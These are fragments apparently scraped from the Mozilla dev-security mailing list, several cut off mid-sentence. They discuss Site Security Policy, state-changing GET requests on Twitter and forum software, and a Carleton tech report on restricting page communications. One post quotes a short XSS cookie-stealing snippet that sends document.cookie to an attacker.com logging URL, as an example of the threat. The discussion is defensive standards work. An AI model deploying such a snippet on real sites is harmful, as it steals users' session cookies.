On Jul 11, 7:16 pm, bsterne <[EMAIL PROTECTED]> wrote:
> Perhaps I am misunderstanding this point. Are you suggesting that an
> ideal model wouldn't require that web developers do anything
> differently than they currently are? Site Security Policy is intended
> to be a belt-and-suspenders tool t
Messed around a bit and noticed that you can indeed post using a GET
request to Twitter. This looks to be somewhat XSRF protected with a
authorization token, so hopefully it's not dead simple to exploit.
However, the delete requests are just simple GETs of the form
http://twitter.com/status/destr
, I've seen forum software (my fuzzy memory says it was
also joomla, but it could have been phpbb or another package) that
allowed posting using a GET request (because there was no check to see
if the variables came in through post or GET -- php is awfully
friendly to this...).
Terri
___
dev-security mailing list
dev-security@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security
Oh, I should probably also mention that we did an HTML conversion of
the tech report, so if anyone hates reading PDFs or just prefers HTML
(I know a surprising number of people who do), you can check it out
either on my university website:
http://www.scs.carleton.ca/~toda/doc/soma/
or my personal
On Jun 17, 9:25 am, Gervase Markham <[EMAIL PROTECTED]> wrote:
> What's the use case for locking down all page communications?
The traditional one: XSS cookie-stealing attacks like this:
var image = new Image();
image.src= ’http://attacker.com/log.php?cookie=’ +
encodeURIComponent(document.cookie
On Jun 12, 7:07 am, Gervase Markham <[EMAIL PROTECTED]> wrote:
>True. SSP in its current form is not a mechanism for locking down all
>page communications
Shouldn't it be? Site admins will already have to provide all the
necessary information in order to be SSP compliant, so it makes sense
to me
We've been doing some very similar work here in the Carleton Computer
Security Lab over the past year, and we put out a tech report in April
that I think would be really helpful:
http://www.scs.carleton.ca/research/tech_reports/index.php?Abstract=tr-08-07_0007&Year=2008
For one, we did a bunch of
